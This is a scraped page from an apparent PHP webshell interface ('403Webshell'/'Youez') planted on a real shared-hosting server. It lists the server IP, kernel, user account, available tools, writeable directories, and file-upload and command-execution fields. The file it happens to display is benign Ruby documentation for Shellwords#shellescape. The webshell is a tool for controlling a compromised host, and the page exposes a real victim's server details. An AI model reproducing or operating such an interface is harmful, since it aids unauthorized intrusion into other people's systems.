403Webshell
Server IP : 66.29.132.122  /  Your IP : 3.144.13.164
Web Server : LiteSpeed
System : Linux business142.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : admazpex ( 531)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /proc/self/root/proc/thread-self/root/proc/thread-self/root/opt/alt/ruby18/share/ri/1.8/system/Shellwords/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /proc/self/root/proc/thread-self/root/proc/thread-self/root/opt/alt/ruby18/share/ri/1.8/system/Shellwords/shellescape-i.yaml
--- !ruby/object:RI::MethodDescription 
aliases: 
- !ruby/object:RI::AliasName 
  name: escape
block_params: 
comment: 
- !ruby/struct:SM::Flow::P 
  body: Escapes a string so that it can be safely used in a Bourne shell command line.
- !ruby/struct:SM::Flow::P 
  body: Note that a resulted string should be used unquoted and is not intended for use in double quotes nor in single quotes.
- !ruby/struct:SM::Flow::VERB 
  body: "  open("| grep #{Shellwords.escape(pattern)} file") { |pipe|\n    # ...\n  }\n"
- !ruby/struct:SM::Flow::P 
  body: +String#shellescape+ is a shorthand for this function.
- !ruby/struct:SM::Flow::VERB 
  body: "  open("| grep #{pattern.shellescape} file") { |pipe|\n    # ...\n  }\n"
full_name: Shellwords#shellescape
is_singleton: false
name: shellescape
params: (str)
visibility: public

Youez - 2016 - github.com/yon3zu
LinuXploit